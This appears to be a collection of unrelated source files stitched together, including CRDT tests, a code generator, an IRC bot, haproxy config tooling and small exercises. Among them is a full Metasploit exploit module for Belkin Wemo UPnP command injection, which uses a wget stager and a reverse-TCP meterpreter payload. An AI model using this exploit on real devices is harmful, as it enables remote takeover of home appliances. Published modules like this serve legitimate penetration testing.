delta4 = replica3.append("Y")
return state1, state2, delta3, delta4
def test_states_and_deltas_applied_in_order(missing_state):
state1, state2, delta3, delta4 = missing_state
replica = RGA("id")
replica.apply(state1)
replica.apply(state2)
replica.apply(delta3)
replica.apply(delta4)
assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
def test_states_and_deltas_applied_in_modified_order(missing_state):
state1, state2, delta3, delta4 = missing_state
replica = RGA("id")
replica.apply(state2)
replica.apply(state1)
replica.apply(delta4)
replica.apply(delta3)
assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
def test_states_and_deltas_applied_deltas_early(missing_state):
state1, state2, delta3, delta4 = missing_state
replica = RGA("id")
replica.apply(state2)
replica.apply(delta3)
replica.apply(state1)
replica.apply(delta4)
assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
|
import codecs
import os
from os import listdir
from jinja2 import Environment, FileSystemLoader
from src.jsonclass import JsonClass
from src.layers.javalayer import JavaClassLayer
from src.layers.markdownlayer import MarkdownClassLayer
from src.layers.phplayer import PhpClassLayer
from src.layers.swiftlayer import SwiftClassLayer
import json
java_template = None
java_package = "com.example.test"
php_template = None
markdown_template = None
swift_template = None
env = None
java_classes ={}
def _apply_function_to_each(dir, function, **kwargs):
"""
Apply fuction to each file in source_dir
"""
for f in listdir(dir):
file_path = os.path.join(os.path.abspath(dir), f)
function(file_path, **kwargs)
def _generate(file_path):
print("Processing %s" % file_path)
json_class = JsonClass(file_path)
java_class = JavaClassLayer(json_class, java_package,'jsons')
java_classes[java_class.name()]=java_class
php_class = PhpClassLayer(json_class)
swift_class = SwiftClassLayer(json_class)
markdown_class = MarkdownClassLayer(json_class, php_template.render(class_=php_class),
java_template.render(class_=java_class),'jsons')
_render_and_write(class_=java_class, template=java_template, target_dir='generated/java', extension='java')
_render_and_write(class_=php_class, template=php_template, target_dir='generated/php', extension='php')
_render_and_write(class_=markdown_class, template=markdown_template, target_dir='generated/docs', extension='md')
_render_and_write(class_=swift_class, template=swift_template, target_dir='generated/swift', extension='swift')
target_flat_file = os.path.join('generated/flat_jsons','{0}.{1}'.format(json_class.json_name, '.json'))
# Wrting new data to target file
with codecs.open(target_flat_file, 'w','utf-8') as f:
json.dump(obj=json_class.get_flat_json_data(),ensure_ascii=False,fp=f,sort_keys="True",indent=4)
def _render_and_write(class_, template, target_dir, extension):
string_out = template.render(class_=class_)
target_path = os.path.join(target_dir, '{0}.{1}'.format(class_.name(), extension))
with codecs.open(target_path, 'w', 'utf-8') as f:
f.write(string_out)
def generate_yaml(dir, target_path):
"""
generate yml for mkdocs
"""
res = []
for f in listdir(dir):
res.append(f.replace('.md', ''))
ytemplate = env.get_template('mkdoc_yaml_template.yaml')
string_out = ytemplate.render(files=res)
with codecs.open(target_path, 'w', 'utf-8') as f:
f.write(string_out)
def generate_graph(target_path):
"""
generate yml for mkdocs
"""
ytemplate = env.get_template('graph_template.dot')
string_out = ytemplate.render(classes=java_classes)
with codecs.open(target_path, 'w', 'utf-8') as f:
f.write(string_out)
if __name__ == '__main__':
env = Environment(loader=FileSystemLoader("../src/templates"), trim_blocks=True)
markdown_template = env.get_template('markdown_template.md')
java_template = env.get_template('java_template.java')
php_template = env.get_template('php_template.php')
swift_template = env.get_template('swift_template.swift')
_apply_function_to_each('jsons', _generate)
# generate_yaml('generated/docs', 'generated/mkdocs.yml')
generate_graph('generated/class_diagram.dot')
|
import re
text = "sangeeth1-23sj@gmail.com random alan@gmail.net string"
pattern = re.compile("[a-zA-Z0-9\.\-\_]+@[a-zA-Z0-9]+\.[a-zA-Z]+")
result = pattern.search(text)
result = pattern.findall(text)
print(result)
|
import re
from random_line import random_line_from_file
from oyoyo import helpers
history = {}
MAXHISTORY = 10
def get_nick(fullnick):
return fullnick.split("!",1)[0]
def echo(client, nick, message):
if message.lower() == "ping":
helpers.msg(client, nick, "pong")
def whoami(client, nick, message):
if message.lower() == "whoami":
helpers.msg(client, nick, "you are %s, I think." % nick)
def uppercase(client, nick, chan, cmd, args):
if cmd.lower() == "upper" and len(args) > 0:
helpers.msg(client, chan, args.upper())
def regex(client, nick, chan, message):
matches = re.match("^s/(.*)/(.*)/(i?)$",message)
if matches:
for nick,item in reversed(history[chan]):
flags = 0
for flag in matches.group(3):
flag = flag.lower()
if flag == "i":
flags = flags | re.I
(replaced,subs) = re.subn(matches.group(1),matches.group(2),item,flags)
if subs > 0:
helpers.msg(client,chan,"<%s> %s" % (get_nick(nick),replaced))
break
else:
print "not a regex, pushing to history"
if chan not in history:
history[chan] = []
history[chan].append( (nick,message) )
if len(history[chan]) > MAXHISTORY:
history[chan].pop(0)
def hackers_cmd(client, nick, chan, cmd, args):
if cmd.lower() == "hackers":
line = random_line_from_file("hackers.txt")
helpers.msg(client,chan,line)
def hackers_pub(client, nick, chan, message):
if "hackers" in message.lower():
line = random_line_from_file("hackers.txt")
helpers.msg(client, chan, line)
|
import psycopg2
db_pools = {}
def get_conn(dbname):
db_cons = db_pools.setdefault(dbname, set())
if not db_cons:
return psycopg2.connect(database=dbname)
else:
return db_cons.pop()
def put_conn(dbname, conn):
db_cons = db_pools.setdefault(dbname, set())
db_cons.add(conn)
class db_conn(object):
def execute(self, query, params=()):
self.cur.execute(query, params)
def execute_fetch(self, query, params=()):
self.cur.execute(query, params)
return self.cur.fetchall()
def execute_fetchone(self, query, params=()):
self.cur.execute(query, params)
return self.cur.fetchone()
def __init__(self, dbname):
self.dbname = dbname
def __enter__(self):
self.conn = get_conn(self.dbname)
self.cur = self.conn.cursor()
return self
def __exit__(self, type, value, traceback):
if type is None:
self.conn.commit()
self.cur.close()
self.conn.rollback()
put_conn(self.dbname, self.conn)
|
import os
from transformers import (T5Config, T5ForConditionalGeneration, Trainer,
TrainingArguments, HfArgumentParser)
from data import read_parallel_split
def main(training_args, args):
if not os.path.isdir(args.model_dir):
os.makedirs(args.model_dir)
config = T5Config(vocab_size=32100)
config.decoder_start_token_id = config.pad_token_id
model = T5ForConditionalGeneration(config)
else:
model = T5ForConditionalGeneration.from_pretrained(args.model_dir)
train_dataset, val_dataset = read_parallel_split(args.parallel_path,
inverse=args.inverse)
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=val_dataset
)
trainer.train()
trainer.save_model(args.model_dir)
if __name__ == '__main__':
parser = HfArgumentParser(TrainingArguments)
parser.add_argument('-m', '--model_dir', required=True,
help='Model save/load directory')
parser.add_argument('-p', '--parallel_path', required=True,
help='Path to tokenized parallel corpus')
parser.add_argument('-i', '--inverse', action='store_true',
help='Train for backtranslation (target -> source)')
training_args, args = parser.parse_args_into_dataclasses()
main(training_args, args)
|
import random
from rollbar.lib import build_key_matcher
from rollbar.lib.transform import Transform
class ScrubTransform(Transform):
suffix_matcher = None
def __init__(self, suffixes=None, redact_char='*', randomize_len=True):
super(ScrubTransform, self).__init__()
if suffixes is not None and len(suffixes) > 0:
self.suffix_matcher = build_key_matcher(suffixes, type='suffix')
self.redact_char = redact_char
self.randomize_len = randomize_len
def in_scrub_fields(self, key):
if self.suffix_matcher is None:
return False
return self.suffix_matcher(key)
def redact(self, val):
if self.randomize_len:
_len = random.randint(3, 20)
else:
try:
_len = len(val)
except:
_len = len(str(val))
return self.redact_char * _len
def default(self, o, key=None):
if self.in_scrub_fields(key):
return self.redact(o)
return o
__all__ = ['ScrubTransform']
|
import logging
import datetime
import traceback
from autobahn.twisted.util import sleep
import inject
from mcloud.application import ApplicationController
from mcloud.container import PrebuiltImageBuilder, InlineDockerfileImageBuilder, VirtualFolderImageBuilder
from mcloud.deployment import DeploymentController, IDeploymentPublishListener
from mcloud.events import EventBus
from mcloud.plugin import IMcloudPlugin
from mcloud.plugins import Plugin, PluginInitError
from mcloud.remote import ApiRpcServer
from mcloud.service import Service, IServiceLifecycleListener
import os
from twisted.internet import reactor, defer
from twisted.internet.defer import inlineCallbacks
from twisted.python import log
from zope.interface import implements
import re
HAPROXY_TPL = """
defaults
option dontlognull
timeout connect 5000
timeout client 50000
timeout server 50000
{% if ssl_apps %}
frontend http_ssl_proxy
mode tcp
bind 0.0.0.0:443
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
{% for app in ssl_apps %}
{% for domain in app.domains %}
acl is_ssl_{{ app.name }} req_ssl_sni -i {{ domain }}
{% endfor %}
use_backend backend_ssl_{{ app.name }}_cluster if is_ssl_{{ app.name }}
{% endfor %}
{% for app in ssl_apps %}
{% for backend in app.backends %}
backend {{ backend.name }}_cluster
mode tcp
# maximum SSL session ID length is 32 bytes.
stick-table type binary len 32 size 30k expire 30m
acl clienthello req_ssl_hello_type 1
acl serverhello rep_ssl_hello_type 2
# use tcp content accepts to detects ssl client and server hello.
tcp-request inspect-delay 5s
tcp-request content accept if clienthello
# no timeout on response inspect delay by default.
tcp-response content accept if serverhello
stick on payload_lv(43,1) if clienthello
# Learn on response if server hello.
stick store-response payload_lv(43,1) if serverhello
option ssl-hello-chk
server {{ backend.name }} {{ backend.ip }}:{{ backend.port }} check
{% endfor %}
{% endfor %}
{% endif %}
frontend http_proxy
bind 0.0.0.0:80
mode http
option httpclose
option forwardfor
{% for app in apps %}
{% for domain in app.domains %}
acl is_{{ app.name }} hdr(host) -i {{ domain }}
{% endfor %}
use_backend backend_{{ app.name }}_cluster if is_{{ app.name }}
{% endfor %}
{% for app in apps %}
{% for backend in app.backends %}
backend {{ backend.name }}_cluster
mode http
server {{ backend.name }} {{ backend.ip }}:{{ backend.port }}
{% endfor %}
{% endfor %}
"""
from jinja2 import Template
logger = logging.getLogger('mcloud.plugin.haproxy')
class HaproxyPlugin(Plugin):
implements(IMcloudPlugin, IServiceLifecycleListener, IDeploymentPublishListener)
eb = inject.attr(EventBus)
settings = inject.attr('settings')
rpc_server = inject.attr(ApiRpcServer)
dep_controller = inject.attr(DeploymentController)
app_controller = inject.attr(ApplicationController)
@inlineCallbacks
def dump(self):
deployments = {}
app_list = yield self.app_controller.list()
for app in app_list:
if not app['deployment'] in deployments:
deployments[app['deployment']] = {
'apps': [],
'ssl_apps': []
}
# if not 'web_target' in app or not app['web_target']:
# continue
plain_domains = {app['web_target']: [app['fullname']]}
ssl_domains = {}
if app['public_urls']:
for target in app['public_urls']:
if not target['service']:
if 'ssl_target' in app and app['ssl_target'] and target['url'].startswith('https://'):
if not app['ssl_target'] in ssl_domains:
ssl_domains[app['ssl_target']] = []
ssl_domains[app['ssl_target']].append(target['url'][8:])
if 'web_target' in app and app['web_target'] and not target['url'].startswith('https://'):
if not app['web_target'] in plain_domains:
plain_domains[app['web_target']] = []
plain_domains[app['web_target']].append(target['url'])
else:
for service in app['services']:
if not service['ip']:
continue
if service['shortname'] == target['service']:
if 'port' in target and target['port']:
service['ip'] = service['ip'] + ':' + target['port']
if 'send-proxy' in service and service['send-proxy']:
service['ip'] = service['ip'] + '@send-proxy'
if target['url'].startswith('https://'):
if not service['ip'] in ssl_domains:
ssl_domains[service['ip']] = []
ssl_domains[service['ip']].append(target['url'][8:])
else:
if not service['ip'] in plain_domains:
plain_domains[service['ip']] = []
plain_domains[service['ip']].append(target['url'])
def format_name(name):
return re.sub('[\.\-\s]+', '_', str(name))
if ssl_domains:
for ip, domains in ssl_domains.items():
port = 443
if ':' in ip:
ip, port = ip.split(':')
deployments[app['deployment']]['ssl_apps'].append({
'name': '%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)),
'domains': domains,
'backends': [{'name': 'backend_ssl_%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)), 'ip': ip, 'port': port}]
})
for ip, domains in plain_domains.items():
if ip is None:
continue
port = 80
if ':' in ip:
ip, port = ip.split(':')
deployments[app['deployment']]['apps'].append({
'name': '%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)),
'domains': domains,
'backends': [{'name': 'backend_%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)), 'ip': ip, 'port': port}]
})
log.msg('Writing haproxy config')
defer.returnValue(deployments)
@inlineCallbacks
def rebuild_haproxy(self, deployments=None, ticket_id=None):
# generate new haproxy config
all_deployments = yield self.dump()
for deployment_name, config in all_deployments.items():
# rebuild only needed deployments
if deployments and not deployment_name in deployments:
continue
if ticket_id:
self.rpc_server.task_progress('Updating haproxy config on deployment %s' % deployment_name, ticket_id)
deployment = yield self.dep_controller.get(deployment_name)
haproxy_path = os.path.expanduser('%s/haproxy/%s' % (self.settings.home_dir, deployment_name))
if not os.path.exists(haproxy_path):
os.makedirs(haproxy_path)
template_path = os.path.join(haproxy_path, 'haproxy.tpl')
haproxy_config_path = os.path.join(haproxy_path, 'haproxy.cfg')
if not os.path.exists(template_path):
with open(template_path, 'w+') as f:
f.write(HAPROXY_TPL)
with open(template_path) as f:
template = Template(f.read())
config_rendered = template.render(config)
with open(haproxy_config_path, 'w+') as f:
f.write(config_rendered)
haproxy = Service(client=deployment.get_client())
haproxy.name = 'mcloud_haproxy'
haproxy.image_builder = VirtualFolderImageBuilder({
'Dockerfile': """
FROM haproxy:1.5
ADD haproxy.cfg /usr/local/etc/haproxy/haproxy.cfg
""",
'haproxy.cfg': config_rendered
})
haproxy.ports = ['80/tcp:80', '443/tcp:443']
# haproxy.volumes = [{
# 'local': haproxy_path,
# 'remote': '/etc/haproxy'
# }]
logger.info('Containers updated: dumping haproxy config.')
if ticket_id:
self.rpc_server.task_progress('updated %s - OK' % deployment_name, ticket_id)
yield haproxy.rebuild()
@inlineCallbacks
def on_service_start(self, service, ticket_id=None):
"""
:param service:
:type service: mcloud.service.Service
:return:
"""
print 'Service start', service
if service.name != 'mcloud_haproxy' and (service.is_web() or service.is_ssl()):
app = yield self.app_controller.get(service.app_name)
if ticket_id:
self.rpc_server.task_progress('Updating haproxy config', ticket_id)
deployment = yield app.get_deployment()
yield self.rebuild_haproxy(deployments=[deployment.name], ticket_id=ticket_id)
@inlineCallbacks
def on_domain_publish(self, deployment, domain, ticket_id=None):
"""
Called when domain is beeing published
"""
if ticket_id:
self.rpc_server.task_progress('Updating haproxy config for deployment %s' % deployment.name, ticket_id)
yield self.rebuild_haproxy(deployments=[deployment.name])
@inlineCallbacks
def on_domain_unpublish(self, deployment, domain, ticket_id=None):
"""
Called when domain is beeing published
"""
if ticket_id:
self.rpc_server.task_progress('Updating haproxy config for deployment %s' % deployment.name, ticket_id)
yield self.rebuild_haproxy(deployments=[deployment.name])
@inlineCallbacks
def setup(self):
yield self.rebuild_haproxy()
|
# O(1) constant
def func_constaant(values):
return values[0]
lst = [1,2,3]
print(func_constaant(lst))
#----------------------------------
# O(n) Linear
def func_linear(lst):
for val in lst:
print(val)
print(func_linear(lst))
#----------------------------------
#O(n^2) Quadratic
def func_quadratic(lst):
for val1 in lst:
for val2 in lst:
print (val1, val2)
print(func_quadratic(lst)) |
def readFile():
f=open('/Users/ArpitAggarwal/workspace/jython-basics/com/test.csv', 'r')
print f
for line in f:
print line.rstrip()
f.close
def copyCSVToTextFile():
f=open('/Users/ArpitAggarwal/workspace/jython-basics/com/test.csv', 'r')
output = open('/Users/ArpitAggarwal/workspace/jython-basics/com/test.txt', 'w')
for line in f:
output.write(line.rstrip() + '\n')
f.close()
readFile()
copyCSVToTextFile()
|
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums: return 0
if len(nums)==1: return 1
if len(nums)==2: return 2 if nums[0]!=nums[1] else 1
ans=len(nums)
prev=nums[0]
up=-1
for n in nums[1:]:
if prev==n:
ans-=1
elif prev<n and up==1:
ans-=1
elif prev>n and up==0:
ans-=1
if prev<n:
up=1
elif prev>n:
up=0
prev=n
return ans
|
from copy import copy
import re
class Issue(object):
def __init__(self,json):
self.__key = json['key']
self.__blocks = [i['outwardIssue']['key'] for i in json['fields']['issuelinks'] if 'outwardIssue' in i.keys()]
self.__blocked_by = [i['inwardIssue']['key'] for i in json['fields']['issuelinks'] if 'inwardIssue' in i.keys()]
self.__summary = json['fields']['summary']
self.__sprint = None
if 'customfield_10004' in json['fields'] and json['fields']['customfield_10004']:
m = re.search("name=.*,start",json['fields']['customfield_10004'][0])
if m:
self.__sprint = json['fields']['customfield_10004'][0][m.start()+len("name="):m.end()-len(",start")]
self.__points = 0
if 'customfield_10002' in json['fields']:
try:
self.__points = int(json['fields']['customfield_10002'])
except TypeError:
pass
except ValueError:
pass
def blocks(self):
return copy(self.__blocks)
def blocked_by(self):
return copy(self.__blocked_by)
def node_name(self):
s = self.__key + ", " + str(self.__sprint) + "[" + str(self.__points) + "]" + "\n" + str(self.__summary)
return s.replace(':','')
def __str__(self):
return self.__key + ": " + self.__summary
|
###############################
# Count symbols in the message
###############################
import pprint
# Set up some message
message = 'This is a test message.'
# Initialize empty dictionary
count = {}
# For each symbol in the message ...
for symbol in message:
# ... if the symbol IS NOT present in the dictionary yet,
# use `setdefault` to add its count as 0,
count.setdefault(symbol, 0)
# ... if the symbol IS already present,
# increase its value by 1
count[symbol] = count[symbol] + 1
# Show final dictionary
print(count)
# # Uncomment for nice look
# pprint.pprint(count)
|
from fourthpack.pages.home.pizza_page import PizzaPage
import unittest
import pytest
@pytest.mark.usefixtures("OneTimeSetUp", "SetUp")
class orderPizzaTest(unittest.TestCase):
def __init__(self, driver):
super().__init__(driver)
self.driver = driver
@pytest.fixture(autouse=True)
def objectSetup (self, OneTimeSetUp):
self.pizza = PizzaPage(self.driver)
@pytest.mark.run(order=1)
def test_pizzaRecipe(self):
self.pizza.OrderThePizza()
|
# Angkan Biswas
# 16.04.2020
# To mark face in taken picture.
# Note: 1. Download 'haarcascade_frontalface_default.xml'
# $ wget https://github.com/opencv/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml
# 2. Install 'opencv-contrib-python'
# $ pip install opencv-contrib-python
import cv2
model = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml') # Load pre-trained model
camera = cv2.VideoCapture(0)
_, picture = camera.read() # Take a picture
faces = model.detectMultiScale(picture)
for x,y,w,h in faces:
cv2.rectangle(picture, (x, y), (x + w, y + h), (255, 0, 0), 2)
cv2.imshow("MyFace", picture)
cv2.waitKey(0) # Hold display window untill a key press
camera.release()
|
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
},
'Author' => [
'phikshun', # Discovery, UFuzz, and modules
'wvu', # Crock-Pot testing and module
'nstarke' # Version-checking research and implementation
],
'References' => [
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
['URL', 'https://github.com/phikshun/ufuzz'],
['URL', 'https://gist.github.com/phikshun/10900566'],
['URL', 'https://gist.github.com/phikshun/9984624'],
['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
['URL', 'http://www.wemo.com/']
],
'DisclosureDate' => '2014-04-04',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'NOCVE' => 'Patched in 2.00.8643 without vendor disclosure',
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
))
register_options([
Opt::RPORT(49152)
])
register_advanced_options([
OptBool.new('ForceExploit', [true, 'Override check result', false]),
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
])
end
def check
checkcode = CheckCode::Unknown
res = send_request_cgi(
'method' => 'GET',
'uri' => '/setup.xml'
)
unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
vprint_error('Wemo-enabled device not detected')
return checkcode
end
vprint_good('Wemo-enabled device detected')
checkcode = CheckCode::Detected
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)
unless version
vprint_error('Could not determine firmware version')
return checkcode
end
vprint_status("Found firmware version: #{version}")
# https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
if version < Gem::Version.new('2.00.8643')
vprint_good("Firmware version #{version} < 2.00.8643")
checkcode = CheckCode::Appears
else
vprint_error("Firmware version #{version} >= 2.00.8643")
checkcode = CheckCode::Safe
end
checkcode
end
def exploit
checkcode = check
unless datastore['ForceExploit']
unless checkcode == CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
end
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
cmdstager = generate_cmdstager(
flavor: :wget,
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path),
noconcat: true
)
# HACK: "chmod +x"
cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
cmdstager = cmdstager.join(';')
vprint_status("Regenerated command stager: #{cmdstager}")
execute_command(cmdstager)
end
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/upnp/control/basicevent1',
'ctype' => 'text/xml',
'headers' => {
'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
},
'data' => generate_soap_xml(cmd)
)
end
def generate_soap_xml(cmd)
<<~EOF
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
<SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
</u:SetSmartDevInfo>
</s:Body>
</s:Envelope>
EOF
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
end
end
|
from __future__ import unicode_literals
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.view import view_config
from ... import models
from ...db import db_transaction
from ...renderers import file_adapter
from ..base import ControllerBase
from ..base import view_defaults
from .resources import FileIndexResource
from .resources import FileResource
@view_defaults(context=FileIndexResource)
class FileIndexController(ControllerBase):
@view_config(request_method='POST')
def post(self):
# settings = self.request.registry.settings
with db_transaction():
aes_iv = None
if 'aes_iv' in self.request.params:
aes_iv = self.request.params['aes_iv'].file.read()
if self.context.entity.encrypted and aes_iv is None:
return HTTPBadRequest(
'Need to provide aes_iv for encrypted session'
)
file_ = models.File.create(
session=self.context.entity,
filename=self.request.params['file'].filename,
mime_type=self.request.params['file'].type,
content=self.request.params['file'].file.read(),
aes_iv=aes_iv,
)
self.publish_event(
file_.session.guid,
dict(file=file_adapter(file_, self.request)),
)
self.request.response.status = '201 Created'
return dict(file=file_)
@view_defaults(context=FileResource)
class FileController(ControllerBase):
@view_config(request_method='GET')
def get(self):
return dict(file=self.context.entity)
|
instructions = map(lambda x: x.strip(), open('input.txt').readlines())
keypad = [
' ',
' 1 ',
' 234 ',
' 56789 ',
' ABC ',
' D ',
' '
]
code = ''
current = [3, 1]
for instruction in instructions:
for move in instruction:
if move == 'U' and keypad[current[0]-1][current[1]] != ' ':
current[0] -= 1
if move == 'D' and keypad[current[0]+1][current[1]] != ' ':
current[0] += 1
if move == 'L' and keypad[current[0]][current[1]-1] != ' ':
current[1] -= 1
if move == 'R' and keypad[current[0]][current[1]+1] != ' ':
current[1] += 1
code += keypad[current[0]][current[1]]
print code
|
#!/usr/bin/python3.5
'''
This program takes EHMM lab files as input and writes numeric text features as
output
Inputs:
[1] Unique phones list
[2] EHMM lab directory
Outputs:
[1] Output directory
Note1: This is intended for seq2seq/end2end learning and hence durations are
not used.
Author: Sivanand Achanta
Date V0: 03-09-2017
'''
import argparse
import os
import csv
# Create a dictionary for unique phones in the dataset
def uniq_phns(opt):
'''
Inputs:
[1] opt.uniqphns_file: file containing the uniq phones of the language
Outputs:
[1] phns_dict: dictionary with phones as keys and numeric indices as values
'''
with open(opt.uniqphns_file) as f:
phns = [line[:-2] for line in f]
phns_dict = {}
for i,j in enumerate(phns):
phns_dict[j] = i
return(phns_dict)
# Read EHMM Label file
def read_ehmmfile(in_file):
'''
Inputs:
[1] in_file: ehmm lab file
Outputs:
[1] phone_list: list of phones in the lab file
'''
fidr = open(in_file,'r')
fidr.readline() # remove the first line (#)
ehmm_obj = csv.reader(fidr, delimiter=' ', )
phone_list = [col[2] for col in ehmm_obj]
return(phone_list)
def convert_ph2id(phns_dict, phone_list):
phone_id = [phns_dict[phn] for phn in phone_list]
return(phone_id)
# Helper function to process the entire EHMM directory
def process_ehmmdir(phns_dict, opt):
for f in os.listdir(opt.ehmm_dir):
fname, ext = os.path.splitext(f)
if ext == '.lab':
print('Processing file ' + fname)
labfile = os.path.join(opt.ehmm_dir, f)
phone_list = read_ehmmfile(labfile)
# convert phone_list to phone_id (numeric format)
phone_id = convert_ph2id(phns_dict, phone_list)
# write the list to output file
out_file = opt.out_dir + fname + '.tfeat'
fo = open(out_file, 'w')
for item in phone_id:
fo.write("%s\n" % item)
fo.close()
if __name__ == "__main__":
# parse the arguments
parser = argparse.ArgumentParser()
parser.add_argument('--uniqphns_file', required=True, help='uniqphns.txt')
parser.add_argument('--ehmm_dir', required=True, help='/voices/lab/')
parser.add_argument('--out_dir', required=True, help='../feats/tfeats/')
opt = parser.parse_args()
print(opt)
# prepare the output directories
try:
os.makedirs(opt.out_dir)
except OSError:
pass
# make uniqe phones dictionary
phns_dict = uniq_phns(opt)
print(phns_dict)
print(len(phns_dict))
# process ehmm dir to extract text feats
process_ehmmdir(phns_dict, opt)
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# from mock import MagicMock
from github_base_action_test_case import GitHubBaseActionTestCase
from store_oauth_token import StoreOauthTokenAction
class StoreOauthTokenActionTestCase(GitHubBaseActionTestCase):
__test__ = True
action_cls = StoreOauthTokenAction
def test_run_uses_online(self):
expected = {'github_type': "online"}
action = self.get_action_instance(self.enterprise_config)
results = action.run(user="octocat",
token="foo",
github_type="online")
self.assertEqual(results, expected)
self.assertEqual("foo",
action.action_service.get_value("token_octocat"))
def test_run_uses_enterprise(self):
expected = {'github_type': "enterprise"}
action = self.get_action_instance(self.enterprise_config)
results = action.run(user="octocat",
token="foo",
github_type="enterprise")
self.assertEqual(results, expected)
self.assertEqual("foo",
action.action_service.get_value("token_enterprise_octocat"))
def test_run_token_string_whitespace_start(self):
expected = {'github_type': "online"}
action = self.get_action_instance(self.full_config)
results = action.run(user="octocat",
token=" foo",
github_type="online")
self.assertEqual(results, expected)
self.assertEqual("foo",
action.action_service.get_value("token_octocat"))
def test_run_token_string_whitespace_end(self):
expected = {'github_type': "online"}
action = self.get_action_instance(self.full_config)
results = action.run(user="octocat",
token="foo ",
github_type="online")
self.assertEqual(results, expected)
self.assertEqual("foo",
action.action_service.get_value("token_octocat"))
def test_run_token_string_whitespace_both(self):
expected = {'github_type': "online"}
action = self.get_action_instance(self.full_config)
results = action.run(user="octocat",
token=" foo ",
github_type="online")
self.assertEqual(results, expected)
self.assertEqual("foo",
action.action_service.get_value("token_octocat"))
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 19:29:29 2019
@author: CEC
"""
a = int (input("Ingrese un numero entre -10 a 10: "))
v=[]
for i in range(-11, 10):
i+=1
v.append(i)
print(v[4][1])
''' if a <= i:
print("No es mayor que", i)
elif a>= i:
print("Si es mayor que", i)
else:
print("Esta en el rango") '''
|
"""
General-purpose utility functions.
"""
import re
def camelcase_to_underscore(camelcase_str):
"""
Replace CamelCase with underscores in camelcase_str (and lower case).
"""
underscore = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', camelcase_str)
lower_underscore = re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', underscore).lower()
return re.sub(r'_{1,}', '_', lower_underscore)
|
from keystoneclient.access import AccessInfoV2
from keystoneclient.auth.identity import BaseIdentityPlugin
from keystoneclient.auth.identity.access import AccessInfoPlugin
from keystoneclient.auth.identity.v2 import Password
from keystoneclient.session import Session
import keystoneclient.v2_0.client as keystone_sclient
import ceilometerclient.v2.client as ceilometer_client
import cinderclient.v2.client as cinder_client
import novaclient.v2.client as nova_client
import neutronclient.v2_0.client as neutron_client
class OpenstackClientBase:
_keystone_client = None
_ceilometer_client = None
_cinder_client = None
_nova_client = None
_neutron_client = None
def __init__(self, session:Session):
self._session = session
@classmethod
